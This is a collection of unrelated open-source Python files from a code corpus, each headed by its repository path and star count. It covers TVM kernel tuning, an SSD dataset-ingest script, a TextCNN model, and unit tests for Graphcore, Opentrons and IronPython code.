allocate_shared = subprocess.getoutput("cat '%s' | grep 'allocate .*shared\[.*\]'" % (lower_file)).split('\n')
shared_memory_in_bytes = 0
for line in allocate_shared:
if not line:
continue
parts = line.split('[')
assert(len(parts) == 2)
parts = parts[1].split(' * ')
assert(len(parts) == 2)
assert(parts[1][-1] == ']')
allocate_type = parts[0]
allocate_val = int(parts[1][:-1])
if allocate_type in ['float32']:
shared_memory_in_bytes += allocate_val * 4
else:
raise Exception("Unrecognized shared memory data type: %s" % allocate_type)
if shared_memory_in_bytes > max_shared_memory_per_block:
raise Exception("Invalid kernel code: using shared_memory_in_bytes %d > max_shared_memory_per_block %d" % (shared_memory_in_bytes, max_shared_memory_per_block))
func = tvm.build(s, arg_bufs, tvm_target, name='template_op')
assert(len(func.imported_modules) == 1)
device_source = translate_code(func.imported_modules[0].get_source())
if code_only:
return device_source
if lower_source and device_source:
tune_slot_id = 0 if 'CUDA_VISIBLE_DEVICES' not in os.environ else int(os.environ['CUDA_VISIBLE_DEVICES'])
exec_fd, _ = system_lock([tune_slot_id])
gpu_id = 0
ctx = tvm.context(tvm_target, gpu_id)
tensors, outs = [], []
for arg in arg_bufs:
shape = [int(x) for x in arg.shape]
is_output = arg.op.__class__ != tvm.tensor.PlaceholderOp
from tvm._ffi.ndarray import empty
td = empty(shape, arg.dtype, ctx)
if is_output:
outs.append(td)
tensors.append(td)
def timeout_handler():
print("Error: Timeout during Kernel warmup")
os._exit(1)
my_timer = Timer(10, timeout_handler, [])
my_timer.start()
# Warmup
func(*tensors)
tvm.ndarray.gpu(gpu_id).sync()
# Estimate
t_start = time.time()
func(*tensors)
tvm.ndarray.gpu(gpu_id).sync()
t_diff = time.time() - t_start
my_timer.cancel()
del my_timer
num_runs = max(3, min(100, math.floor(1.0 / t_diff)))
timeout_seconds = math.ceil((num_runs + 5) * t_diff)
my_timer = Timer(timeout_seconds, timeout_handler, [])
my_timer.start()
timer_f = func.time_evaluator(func.entry_name, ctx, number=num_runs)
t = timer_f(*tensors).mean
my_timer.cancel()
exec_fd()
gflops = compute_gflops(task.flop, t)
print("[TVM-engine] Average time cost of %d runs = %g ms, %g gflops." % (num_runs, t * 1e3, gflops))
with open(local_get_dir_file('result.txt'), 'w') as fp:
fp.write(str(t))
if __name__ == '__main__':
try:
search_op_config()
except SystemExit:
sys.exit(0)
except:
import traceback
traceback.print_exc()
|
pybrain/structure/connections/__init__.py
|
sveilleux1/pybrain
| 2,208 |
88819
|
<filename>pybrain/structure/connections/__init__.py
from pybrain.structure.connections.full import FullConnection
from pybrain.structure.connections.identity import IdentityConnection
from pybrain.structure.connections.shared import SharedFullConnection, MotherConnection, SharedConnection
from pybrain.structure.connections.linear import LinearConnection
from pybrain.structure.connections.fullnotself import FullNotSelfConnection
|
examples/alias.py
|
wyfo/apimodel
| 118 |
88830
|
<filename>examples/alias.py
from dataclasses import dataclass, field
from apischema import alias, deserialize, serialize
from apischema.json_schema import deserialization_schema
@dataclass
class Foo:
class_: str = field(metadata=alias("class"))
assert deserialization_schema(Foo) == {
"$schema": "http://json-schema.org/draft/2020-12/schema#",
"additionalProperties": False,
"properties": {"class": {"type": "string"}},
"required": ["class"],
"type": "object",
}
assert deserialize(Foo, {"class": "bar"}) == Foo("bar")
assert serialize(Foo, Foo("bar")) == {"class": "bar"}
|
llvm/utils/lit/tests/Inputs/googletest-upstream-format/DummySubDir/OneTest.py
|
medismailben/llvm-project
| 4,812 |
88834
|
<reponame>medismailben/llvm-project
#!/usr/bin/env python
import sys
if len(sys.argv) != 2:
raise ValueError("unexpected number of args")
if sys.argv[1] == "--gtest_list_tests":
print("""\
Running main() from gtest_main.cc
FirstTest.
subTestA
subTestB
ParameterizedTest/0.
subTest
ParameterizedTest/1.
subTest""")
sys.exit(0)
elif not sys.argv[1].startswith("--gtest_filter="):
raise ValueError("unexpected argument: %r" % (sys.argv[1]))
test_name = sys.argv[1].split('=',1)[1]
print('Running main() from gtest_main.cc')
if test_name == 'FirstTest.subTestA':
print('I am subTest A, I PASS')
print('[ PASSED ] 1 test.')
sys.exit(0)
elif test_name == 'FirstTest.subTestB':
print('I am subTest B, I FAIL')
print('And I have two lines of output')
sys.exit(1)
elif test_name in ('ParameterizedTest/0.subTest',
'ParameterizedTest/1.subTest'):
print('I am a parameterized test, I also PASS')
print('[ PASSED ] 1 test.')
sys.exit(0)
else:
raise SystemExit("error: invalid test name: %r" % (test_name,))
|
examples/ssd/datasets/ingest_pascalvoc.py
|
rsketine/neon
| 4,415 |
88849
|
<reponame>rsketine/neon<gh_stars>1000+
#!/usr/bin/env python
# ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
from argparse import ArgumentParser
from convert_xml_to_json import convert_xml_to_json
import numpy as np
import os
import tarfile
import ingest_utils as util
from collections import OrderedDict
from tqdm import tqdm
from neon.util.persist import get_data_cache_or_nothing
def get_ssd_config(img_reshape, inference=False):
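    # Build the dataloader configuration: ETL and augmentation settings plus
    # per-layer prior-box sizes for the 300x300 or 512x512 SSD variants.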
ssd_config = OrderedDict()
ssd_config['batch_size'] = 32
ssd_config['shuffle_enable'] = True
ssd_config['shuffle_manifest'] = True
if inference:
ssd_config['batch_size'] = 1
ssd_config['block_size'] = 50
ssd_config['cache_directory'] = get_data_cache_or_nothing(subdir='pascalvoc_cache')
ssd_config["etl"] = [{
"type": "localization_ssd",
"height": img_reshape[0],
"width": img_reshape[1],
"max_gt_boxes": 500,
"class_names": ["__background__", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant",
"sheep", "sofa", "train", "tvmonitor"]
}, {
"type": "image",
"height": img_reshape[0],
"width": img_reshape[1],
"channels": 3
}]
if not inference:
ssd_config["augmentation"] = [{
"type": "image",
"crop_enable": False,
"flip_enable": True,
"expand_ratio": [1., 4.],
"expand_probability": 0.5,
# "emit_constraint_type": "center", TODO: enable when adds support for no gt boxes
"brightness": [0.9, 1.1],
"hue": [-18, 18],
"saturation": [0.9, 1.1],
"contrast": [0.9, 1.1],
"batch_samplers":
[
{
"max_sample": 1,
"max_trials": 1
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.1}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.3}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.5}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.7}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.9}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"max_jaccard_overlap": 1.0, "min_jaccard_overlap": 0.1}
}
]
}]
if img_reshape == (300, 300):
ssd_config['ssd_config'] = OrderedDict(
[('conv4_3', {'min_sizes': 30.0, 'max_sizes': 60.0,
'aspect_ratios': 2.0, 'step': 8, 'normalize': True}),
('fc7', {'min_sizes': 60.0, 'max_sizes': 111.0,
'aspect_ratios': (2.0, 3.0), 'step': 16}),
('conv6_2', {'min_sizes': 111.0, 'max_sizes': 162.0,
'aspect_ratios': (2.0, 3.0), 'step': 32}),
('conv7_2', {'min_sizes': 162.0, 'max_sizes': 213.0,
'aspect_ratios': (2.0, 3.0), 'step': 64}),
('conv8_2', {'min_sizes': 213.0, 'max_sizes': 264.0,
'aspect_ratios': 2.0, 'step': 100}),
('conv9_2', {'min_sizes': 264.0, 'max_sizes': 315.0,
'aspect_ratios': 2.0, 'step': 300})])
elif img_reshape == (512, 512):
ssd_config['ssd_config'] = OrderedDict(
[('conv4_3', {'min_sizes': 35.84, 'max_sizes': 76.80,
'aspect_ratios': 2.0, 'step': 8, 'normalize': True}),
('fc7', {'min_sizes': 76.80, 'max_sizes': 153.6,
'aspect_ratios': (2.0, 3.0), 'step': 16}),
('conv6_2', {'min_sizes': 153.6, 'max_sizes': 230.4,
'aspect_ratios': (2.0, 3.0), 'step': 32}),
('conv7_2', {'min_sizes': 230.4, 'max_sizes': 307.2,
'aspect_ratios': (2.0, 3.0), 'step': 64}),
('conv8_2', {'min_sizes': 307.2, 'max_sizes': 384.0,
'aspect_ratios': 2.0, 'step': 128}),
('conv9_2', {'min_sizes': 384.0, 'max_sizes': 460.8,
'aspect_ratios': 2.0, 'step': 256}),
('conv10_2', {'min_sizes': 460.8, 'max_sizes': 537.8,
'aspect_ratios': 2.0, 'step': 512})])
else:
raise ValueError("Image shape of {} not supported.".format(img_reshape))
return ssd_config
def extract_tarfiles(tarfiles, out_dir):
for file in tarfiles:
with tarfile.open(file, 'r') as t:
print("Extracting {} to {}".format(file, out_dir))
t.extractall(out_dir)
def get_tag_list(index_file):
with open(index_file) as f:
tag_list = [tag.rstrip(os.linesep) for tag in f]
return tag_list
def ingest_pascal(data_dir, out_dir, img_reshape=(300, 300), overwrite=False, skip_untar=False):
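    # Extract the VOC tarballs, convert the XML annotations to JSON, prepare
    # the image copies, then write train/val manifests and the SSD/training
    # config files under the VOCdevkit output directory.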
assert img_reshape is not None, "Target image reshape required."
hw = '{}x{}'.format(img_reshape[0], img_reshape[1])
datasets = ['VOC2007', 'VOC2012']
tar_files = {'VOC2007': ['VOCtrainval_06-Nov-2007.tar', 'VOCtest_06-Nov-2007.tar'],
'VOC2012': ['VOCtrainval_11-May-2012.tar']}
index_name = {'trainval': 'trainval.txt', 'test': 'test.txt'}
manifest = {'trainval': [], 'test': []}
root_dir = os.path.join(out_dir, 'VOCdevkit')
train_manifest = os.path.join(root_dir, 'train_{}.csv'.format(hw))
val_manifest = os.path.join(root_dir, 'val_{}.csv'.format(hw))
if os.path.exists(train_manifest) and os.path.exists(val_manifest) and not overwrite:
print("Manifest files already found, skipping ingest.")
print("Use --overwrite flag to force re-ingest.")
return
for year in datasets:
tags = {'trainval': [], 'test': []}
# define paths
if skip_untar is False:
tarfiles = [os.path.join(data_dir, tar) for tar in tar_files[year]]
extract_tarfiles(tarfiles, out_dir)
# read the index files and build a list of tags to process
# in PASCALVOC, each tag (e.g. '000032') refers to an image (000032.jpg)
# and an annotation XML file (000032.xml)
for sets in index_name.keys():
index_file = os.path.join(root_dir, year, 'ImageSets', 'Main', index_name[sets])
if os.path.exists(index_file):
tag_list = get_tag_list(index_file)
tags[sets].extend(tag_list)
print('Found {} images in {}'.format(len(tag_list), index_file))
img_folder = os.path.join(root_dir, year, 'JPEGImages')
annot_folder = os.path.join(root_dir, year, 'Annotations')
# create data folders to save converted images and annotations
target_img_folder = os.path.join(root_dir, year, 'JPEGImages-converted')
target_annot_folder = os.path.join(root_dir, year, 'Annotations-json')
print('Processing {}'.format(year))
util.make_dir(target_img_folder)
util.make_dir(target_annot_folder)
all_tags = tags['trainval'] + tags['test'] # process all the tags in our index files.
for tag in tqdm(all_tags):
image = os.path.join(img_folder, tag + '.jpg')
annot = os.path.join(annot_folder, tag + '.xml')
assert os.path.exists(image)
assert os.path.exists(annot)
target_image = os.path.join(target_img_folder, tag + '.jpg')
target_annot = os.path.join(target_annot_folder, tag + '.json')
# convert the annotations to json, including difficult objects
convert_xml_to_json(annot, target_annot, difficult=True, img_reshape=None)
util.resize_image(image, target_image, img_reshape=None)
if tag in tags['trainval']:
manifest['trainval'].append((target_image, target_annot))
elif tag in tags['test']:
manifest['test'].append((target_image, target_annot))
np.random.seed(0)
np.random.shuffle(manifest['trainval'])
util.create_manifest(train_manifest, manifest['trainval'], root_dir)
util.create_manifest(val_manifest, manifest['test'], root_dir)
# write SSD CONFIG
ssd_config = get_ssd_config(img_reshape)
ssd_config_path = os.path.join(root_dir, 'pascalvoc_ssd_{}.cfg'.format(hw))
util.write_ssd_config(ssd_config, ssd_config_path, True)
# write SSD VAL CONFIG
ssd_config_val = get_ssd_config(img_reshape, True)
ssd_config_path_val = os.path.join(root_dir, 'pascalvoc_ssd_{}_val.cfg'.format(hw))
util.write_ssd_config(ssd_config_val, ssd_config_path_val, True)
config_path = os.path.join(root_dir, 'pascalvoc_{}.cfg'.format(hw))
config = {'manifest': '[train:{}, val:{}]'.format(train_manifest, val_manifest),
'manifest_root': root_dir,
'epochs': 230,
'height': img_reshape[0],
'width': img_reshape[1],
'ssd_config': '[train:{}, val:{}]'.format(ssd_config_path, ssd_config_path_val)
}
util.write_config(config, config_path)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--input_dir', required=True, help='path to directory with vocdevkit data')
parser.add_argument('--output_dir', required=True, help='output directory')
parser.add_argument('--overwrite', action='store_true', help='overwrite files')
parser.add_argument('--height', type=int, default=300, help='height of reshaped image')
    parser.add_argument('--width', type=int, default=300, help='width of reshaped image')
parser.add_argument('--skip_untar', action='store_true',
help='skip the untar. Use if unzipped files already exist.')
args = parser.parse_args()
ingest_pascal(args.input_dir, args.output_dir, img_reshape=(args.height, args.width),
overwrite=args.overwrite, skip_untar=args.skip_untar)
|
Model_TextCNN/old_code/model.py
|
DmytroBabenko/Text-Classification-Models-Pytorch
| 481 |
88858
|
# model.py
import torch
from torch import nn
from torch import Tensor
from torch.autograd import Variable
import numpy as np
from sklearn.metrics import accuracy_score
class CNNText(nn.Module):
def __init__(self, config):
super(CNNText, self).__init__()
self.config = config
# Convolutional Layer
# We use 3 kernels as in original paper
# Size of kernels: (3,300),(4,300),(5,300)
self.conv1 = nn.Conv2d(in_channels=self.config.in_channels, out_channels=self.config.num_channels,
kernel_size=(self.config.kernel_size[0],self.config.embed_size),
stride=1, padding=0)
self.activation1 = nn.ReLU()
self.max_out1 = nn.MaxPool1d(self.config.max_sen_len - self.config.kernel_size[0]+1)
self.conv2 = nn.Conv2d(in_channels=self.config.in_channels, out_channels=self.config.num_channels,
kernel_size=(self.config.kernel_size[1],self.config.embed_size),
stride=1, padding=0)
self.activation2 = nn.ReLU()
self.max_out2 = nn.MaxPool1d(self.config.max_sen_len - self.config.kernel_size[1]+1)
self.conv3 = nn.Conv2d(in_channels=self.config.in_channels, out_channels=self.config.num_channels,
kernel_size=(self.config.kernel_size[2],self.config.embed_size),
stride=1, padding=0)
self.activation3 = nn.ReLU()
self.max_out3 = nn.MaxPool1d(self.config.max_sen_len - self.config.kernel_size[2]+1)
self.dropout = nn.Dropout(self.config.dropout_keep)
# Fully-Connected Layer
self.fc = nn.Linear(self.config.num_channels*len(self.config.kernel_size), self.config.output_size)
# Softmax non-linearity
        self.softmax = nn.Softmax(dim=1)
def forward(self, x):
x = x.unsqueeze(1) # (batch_size,max_seq_len,embed_size) => (batch_size,1,max_seq_len,embed_size)
conv_out1 = self.conv1(x).squeeze(3)
activation_out1 = self.activation1(conv_out1)
max_out1 = self.max_out1(activation_out1).squeeze(2)
conv_out2 = self.conv2(x).squeeze(3)
activation_out2 = self.activation2(conv_out2)
max_out2 = self.max_out2(activation_out2).squeeze(2)
conv_out3 = self.conv3(x).squeeze(3)
activation_out3 = self.activation3(conv_out3)
max_out3 = self.max_out3(activation_out3).squeeze(2)
all_out = torch.cat((max_out1, max_out2, max_out3), 1)
final_feature_map = self.dropout(all_out)
final_out = self.fc(final_feature_map)
return self.softmax(final_out)
def add_optimizer(self, optimizer):
self.optimizer = optimizer
def add_loss_op(self, loss_op):
self.loss_op = loss_op
def run_epoch(self, train_data, val_data):
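        # One training epoch: iterate mini-batches from data_iterator (expected
        # to be provided elsewhere in the repo; it is not imported in this
        # file), back-propagate the loss, and report average training loss and
        # validation accuracy every 50 iterations.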
train_x, train_y = train_data[0], train_data[1]
val_x, val_y = val_data[0], val_data[1]
iterator = data_iterator(train_x, train_y, self.config.batch_size)
train_losses = []
val_accuracies = []
losses = []
for i, (x,y) in enumerate(iterator):
self.optimizer.zero_grad()
x = Tensor(x).cuda()
y_pred = self.__call__(x)
loss = self.loss_op(y_pred, torch.cuda.LongTensor(y-1))
loss.backward()
losses.append(loss.data.cpu().numpy())
self.optimizer.step()
if (i + 1) % 50 == 0:
print("Iter: {}".format(i+1))
avg_train_loss = np.mean(losses)
train_losses.append(avg_train_loss)
print("\tAverage training loss: {:.5f}".format(avg_train_loss))
losses = []
# Evalute Accuracy on validation set
self.eval()
all_preds = []
val_iterator = data_iterator(val_x, val_y, self.config.batch_size)
for j, (x,y) in enumerate(val_iterator):
x = Variable(Tensor(x))
y_pred = self.__call__(x.cuda())
predicted = torch.max(y_pred.cpu().data, 1)[1] + 1
all_preds.extend(predicted.numpy())
score = accuracy_score(val_y, np.array(all_preds).flatten())
val_accuracies.append(score)
print("\tVal Accuracy: {:.4f}".format(score))
self.train()
return train_losses, val_accuracies
|
applications/tensorflow2/image_classification/test/test_models.py
|
payoto/graphcore_examples
| 260 |
88883
|
<filename>applications/tensorflow2/image_classification/test/test_models.py<gh_stars>100-1000
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
import unittest
from pathlib import Path
import sys
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.python import ipu
sys.path.append(str(Path(__file__).absolute().parent.parent))
from model.model_factory import ModelFactory
from model.toy_model import ToyModel
from model.resnet_models import ResNet50
from custom_exceptions import DimensionError
class ResNetVersionTest(unittest.TestCase):
@staticmethod
def get_num_of_trainable_weights(model):
return np.sum([np.prod(layer.numpy().shape) for layer in model.trainable_weights])
def test_resnet50_num_learnable_parameters(self):
'''A test of whether ResNet50 implementations in TF1 and TF2 are alike.'''
NUM_OF_LEARNABLE_PARAMETERS_TF1 = 25557032
num_trainable_weights_tf2 = self.get_num_of_trainable_weights(model=ResNet50())
assert num_trainable_weights_tf2 == NUM_OF_LEARNABLE_PARAMETERS_TF1
class UnsupportedModelTest(unittest.TestCase):
def test_unsupported_model(self):
with self.assertRaises(NameError):
ModelFactory.create_model(model_name='foo',
input_shape=(32, 32, 3),
classes=2)
class InvalidStageNameTest(unittest.TestCase):
def test_invalid_layer_name(self):
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = ModelFactory.create_model(model_name='toy_model', weights=None, input_shape=(28, 28, 1), classes=10)
with self.assertRaises(NameError):
model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'foo'], device_mapping=[], pipeline_schedule='Grouped',
available_memory_proportion=[])
def test_invalid_layer_order(self):
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = ModelFactory.create_model(model_name='toy_model', weights=None, input_shape=(28, 28, 1), classes=10)
with self.assertRaises(NameError):
model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'conv2d_1', 'conv2d'], device_mapping=[], pipeline_schedule='Grouped',
available_memory_proportion=[])
class InvalidDeviceMappingTest(unittest.TestCase):
def test_invalid_number_of_device_mapping(self):
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = ModelFactory.create_model(model_name='toy_model', weights=None, input_shape=(28, 28, 1), classes=10)
with self.assertRaises(DimensionError):
model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'conv2d_1', 'flatten'], device_mapping=[0, 1], pipeline_schedule='Grouped',
available_memory_proportion=[])
def test_invalid_id_of_device_mapping(self):
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = ModelFactory.create_model(model_name='toy_model', weights=None, input_shape=(28, 28, 1), classes=10)
with self.assertRaises(DimensionError):
model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'conv2d_1', 'flatten'], device_mapping=[1, 2, 3], pipeline_schedule='Grouped',
available_memory_proportion=[])
class CreateModelTest(unittest.TestCase):
def get_predictions_for_model(self, model_name: str):
tf.random.set_seed(1)
np.random.seed(0)
image0 = np.zeros((1, 32, 32, 3))
image1 = np.ones((1, 32, 32, 3)) * 10
model = ModelFactory.create_model(model_name=model_name,
input_shape=(32, 32, 3),
classes=2)
image0_preds = model.predict(image0)[0]
image1_preds = model.predict(image1)[0]
tf.random.set_seed(None)
np.random.seed(None)
return (image0_preds, image1_preds)
def test_resnet50_output(self):
image0_preds, image1_preds = self.get_predictions_for_model(model_name='resnet50')
assert (np.array_equal(image0_preds, [0.5, 0.5]))
assert (np.allclose(image1_preds, [0.40129033, 0.5987097]))
def test_resnet34_output(self):
image0_preds, image1_preds = self.get_predictions_for_model(model_name='resnet34')
assert (np.array_equal(image0_preds, [0.5, 0.5]))
assert (np.allclose(image1_preds, [0.53946716, 0.46053284]))
def test_resnet18_output(self):
image0_preds, image1_preds = self.get_predictions_for_model(model_name='resnet18')
assert (np.array_equal(image0_preds, [0.5, 0.5]))
assert (np.allclose(image1_preds, [0.44021496, 0.55978507]))
class CreateToyModelTest(unittest.TestCase):
def test_toy_model_prediction(self):
tf.random.set_seed(1)
model = ToyModel(input_shape=(32, 32, 3), classes=10)
image_1 = np.ones((1, 32, 32, 3)) * 10
assert (np.allclose(
model.predict(image_1)[0], [0.08292384, 0.05735856, 0.27028584, 0.2666999, 0.02177826,
0.01853362, 0.06498592, 0.04272136, 0.15957771, 0.015135]))
tf.random.set_seed(None)
class CreateToyModelInFactory(unittest.TestCase):
def test_toy_model_factory_prediction(self):
tf.random.set_seed(1)
model = ModelFactory.create_model(model_name='toy_model',
weights=None,
input_shape=(32, 32, 3),
classes=10)
image_1 = np.ones((1, 32, 32, 3)) * 10
assert (np.allclose(
model.predict(image_1)[0], [0.08292384, 0.05735856, 0.27028584, 0.2666999, 0.02177826,
0.01853362, 0.06498592, 0.04272136, 0.15957771, 0.015135]))
tf.random.set_seed(None)
class ConfigurePipelineTest(unittest.TestCase):
def test_pipeline_split(self):
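        # Check that ModelFactory.configure_model assigns the same pipeline
        # stages as a model built with explicit ipu.keras.PipelineStage scopes.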
def initial_model_1():
model_input = keras.Input(shape=(32, 32, 3))
model_output = keras.layers.MaxPooling2D(name='test_pipeline_split_layer1')(model_input)
model_output_1 = keras.layers.Conv2D(
filters=32, kernel_size=3, name='test_pipeline_split_layer2')(model_output)
model_output_2 = keras.layers.Conv2D(
filters=32, kernel_size=3, name='test_pipeline_split_layer3')(model_output)
model_output = keras.layers.Add(name='test_pipeline_split_layer4')([model_output_1, model_output_2])
model_output = keras.layers.Flatten(name='test_pipeline_split_layer5')(model_output)
return keras.Model(model_input, model_output)
def expected_model_1():
model_input = keras.Input(shape=(32, 32, 3))
with ipu.keras.PipelineStage(0):
model_output = keras.layers.MaxPooling2D()(model_input)
model_output_1 = keras.layers.Conv2D(filters=32, kernel_size=3)(model_output)
with ipu.keras.PipelineStage(1):
model_output_2 = keras.layers.Conv2D(filters=32, kernel_size=3)(model_output)
model_output = keras.layers.Add()([model_output_1, model_output_2])
with ipu.keras.PipelineStage(2):
model_output = keras.layers.Flatten()(model_output)
return keras.Model(model_input, model_output)
train_strategy = ipu.ipu_strategy.IPUStrategy()
with train_strategy.scope():
model = initial_model_1()
pipelined_model = ModelFactory.configure_model(model=model, gradient_accumulation_count=1, pipeline_splits=[
'test_pipeline_split_layer3', 'test_pipeline_split_layer5'],
device_mapping=[], pipeline_schedule='Grouped',
available_memory_proportion=[])
expected_assignments = expected_model_1().get_pipeline_stage_assignment()
pipelined_assignments = pipelined_model.get_pipeline_stage_assignment()
for expected_assignment, pipelined_assignment in zip(expected_assignments, pipelined_assignments):
                assert(expected_assignment.layer.__class__.__name__ == pipelined_assignment.layer.__class__.__name__)
assert(expected_assignment.pipeline_stage == pipelined_assignment.pipeline_stage)
|
api/tests/opentrons/tools/test_pipette_memory.py
|
anuwrag/opentrons
| 235 |
88921
|
from mock import AsyncMock
import pytest
from opentrons.drivers.smoothie_drivers import SmoothieDriver
from opentrons.tools import write_pipette_memory
@pytest.fixture
def mock_driver() -> AsyncMock:
return AsyncMock(spec=SmoothieDriver)
async def test_write_identifiers(mock_driver: AsyncMock) -> None:
"""It should call driver to write a new id and model."""
mount = "left"
new_id = "some id"
new_model = "some model"
mock_driver.read_pipette_id.return_value = new_id
mock_driver.read_pipette_model.return_value = new_model
await write_pipette_memory.write_identifiers(
mount=mount, new_id=new_id, new_model=new_model, driver=mock_driver
)
mock_driver.write_pipette_id.assert_called_once_with(mount, new_id)
mock_driver.read_pipette_id.assert_called_once_with(mount)
mock_driver.write_pipette_model.assert_called_once_with(mount, new_model)
mock_driver.read_pipette_model.assert_called_once_with(mount)
async def test_write_identifiers_id_mismatch(mock_driver: AsyncMock) -> None:
"""It should fail when written id doesn't match read id."""
mount = "left"
new_id = "some id"
new_model = "some model"
mock_driver.read_pipette_id.return_value = new_id + "_wrong"
with pytest.raises(Exception):
await write_pipette_memory.write_identifiers(
mount=mount, new_id=new_id, new_model=new_model, driver=mock_driver
)
async def test_write_identifiers_model_mismatch(mock_driver: AsyncMock) -> None:
"""It should fail when written model doesn't match read model."""
mount = "left"
new_id = "some id"
new_model = "some model"
mock_driver.read_pipette_id.return_value = new_id
mock_driver.read_pipette_model.return_value = new_model + "_wrong"
with pytest.raises(Exception):
await write_pipette_memory.write_identifiers(
mount=mount, new_id=new_id, new_model=new_model, driver=mock_driver
)
async def test_check_previous_data(mock_driver: AsyncMock) -> None:
"""It should read the pipette id and model"""
mount = "left"
await write_pipette_memory.check_previous_data(mount, mock_driver)
mock_driver.read_pipette_id.assert_called_once_with(mount)
mock_driver.read_pipette_model.assert_called_once_with(mount)
pipette_barcode_to_model = {
"P10S20180101A01": "p10_single_v1",
"P10M20180101A01": "p10_multi_v1",
"P50S180101A01": "p50_single_v1",
"P50M20180101B01": "p50_multi_v1",
"P300S20180101A01": "p300_single_v1",
"P300M20180101A01": "p300_multi_v1",
"P1000S20180101A01": "p1000_single_v1",
"P10SV1318010101": "p10_single_v1.3",
"P10MV1318010102": "p10_multi_v1.3",
"P50SV1318010103": "p50_single_v1.3",
"P50MV1318010104": "p50_multi_v1.3",
"P3HSV1318010105": "p300_single_v1.3",
"P3HMV1318010106": "p300_multi_v1.3",
"P1KSV1318010107": "p1000_single_v1.3",
"P10SV1418010101": "p10_single_v1.4",
"P10MV1418010102": "p10_multi_v1.4",
"P50SV1418010103": "p50_single_v1.4",
"P50MV1418010104": "p50_multi_v1.4",
"P3HSV1418010105": "p300_single_v1.4",
"P3HMV1418010106": "p300_multi_v1.4",
"P1KSV1418010107": "p1000_single_v1.4",
"P20MV2120120204": "p20_multi_v2.1",
"P1KSV2218010107": "p1000_single_v2.2",
"P20SV2220020501": "p20_single_v2.2",
}
def test_parse_model_from_barcode() -> None:
for barcode, model in pipette_barcode_to_model.items():
assert write_pipette_memory._parse_model_from_barcode(barcode) == model
with pytest.raises(Exception):
write_pipette_memory._parse_model_from_barcode("P1HSV1318010101")
with pytest.raises(Exception):
write_pipette_memory._parse_model_from_barcode("P1KSV1218010101")
with pytest.raises(Exception):
write_pipette_memory._parse_model_from_barcode("aP300S20180101A01")
|
Tests/test_python25.py
|
cwensley/ironpython2
| 1,078 |
88932
|
<filename>Tests/test_python25.py
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
import exceptions
import sys
import unittest
from iptest import is_cli, run_test
isPython25 = ((sys.version_info[0] == 2) and (sys.version_info[1] >= 5)) or (sys.version_info[0] > 2)
m = 0
gblvar = 0
@unittest.skipUnless(isPython25, 'Version of Python is too low, must be 2.5 or above')
class Python25Test(unittest.TestCase):
def test_raise_exit(self):
"""test case with RAISE(exit consumes), YIELD, RETURN, BREAK and CONTINUE in WITH"""
globals()["m"] = 0
class A:
def __enter__(self):
globals()["m"] += 99
return 300
def __exit__(self,type,value,traceback):
if(type == None and value == None and traceback == None):
globals()["m"] += 55
else:
globals()["m"] *= 2
return 1
a = A()
def foo():
p = 100
for y in [1,2,3,4,5,6,7,8,9]:
for x in [10,20,30,40,50,60,70,80,90]:
with a as b:
p = p + 1
if ( x == 20 ): continue
if ( x == 50 and y == 5 ): break
if( x != 40 and y != 4) : yield p
p = p + 5
p = p + x * 100
p = p + 1
if(x % 3 == 0):
raise RuntimeError("we force exception")
if(y == 8):
globals()["m"] += p
return
if(x % 3 == 0 and y %3 == 0):
raise RuntimeError("we force exception")
if ( x == 90 ): continue
if ( x == 60 and y == 6 ): break
yield b + p
p = p + 1
try:
k = foo()
while(k.next()):pass
except StopIteration: self.assertEqual(globals()["m"],427056988)
else:self.fail("Expected StopIteration but found None")
def test__enter__(self):
"""testing __enter__"""
def just_a_fun(arg): return 300
class B:
def __enter__(self): return "Iron", "Python", just_a_fun
def __exit__(self, a,b,c): pass
mydict = {1: [0,1,2], 2:None }
with B() as (mydict[1][0], mydict[2], B.myfun):
self.assertEqual((mydict[1],mydict[2],B().myfun()),(["Iron",1,2],"Python",just_a_fun(None)) )
            #ensure the values are the same outside the with block as well
self.assertEqual((mydict[1],mydict[2],B().myfun()),(["Iron",1,2],"Python",just_a_fun(None)) )
# more args
class C:
def __enter__(self,morearg): pass
def __exit__(self, a,b,c): pass
try:
